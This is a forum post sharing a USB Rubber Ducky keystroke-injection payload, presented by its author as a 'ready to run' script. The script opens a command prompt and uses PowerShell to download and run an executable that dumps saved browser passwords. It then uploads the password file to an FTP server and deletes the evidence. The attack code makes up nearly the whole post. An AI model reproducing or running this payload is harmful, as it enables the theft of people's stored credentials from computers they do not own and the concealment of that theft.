Jump to content

[Payload] Just made my first working payload


crashie
 Share

Recommended Posts

Have put together different parts to get what I needed and it works. It may need some fine-tuning but it's the first payload I've ran successfully that really does something :P (got my rubber ducky yesterday).

What it does is that it downloads a browser password decryptor and executes it and saves the passwords to a .htm file and then it uploads the .htm to an FTP and when the upload is finished it quits and delete the executable together with the .htm file containing all the passwords.

This is how it looks like, and yeah.. don't laugh :P It's my first attempt and I think you can guess what I will be doing this weekend :P I will try to make it upload the passwords to a server with PHP instead.

But here's the script ready to run, well.. at least it works :P Any attempts to help with the fine tuning is welcome :) But I do as always.. learning by doing ;)

GUI R
DELAY 200
STRING cmd
ENTER
DELAY 50
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://websitecom/file.dba','%TEMP%\pass.exe'); Start-Process "%TEMP%\pass.exe pass.htm"
DELAY 50
ENTER
DELAY 2000
STRING cd %USERPROFILE%
ENTER
DELAY 50
STRING ftp
ENTER
DELAY 50
STRING o
ENTER
DELAY 50
STRING ftp.website.com 21
ENTER
DELAY 50
STRING username
ENTER
DELAY 50
STRING password
ENTER
DELAY 100
STRING put pass.htm
ENTER
DELAY 1000
STRING bye
ENTER
STRING erase /Q %TEMP%\pass.exe %UserProfile%\pass.htm
ENTER
DELAY 500
STRING exit
ENTER
Edited by midnitesnake
formatting
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...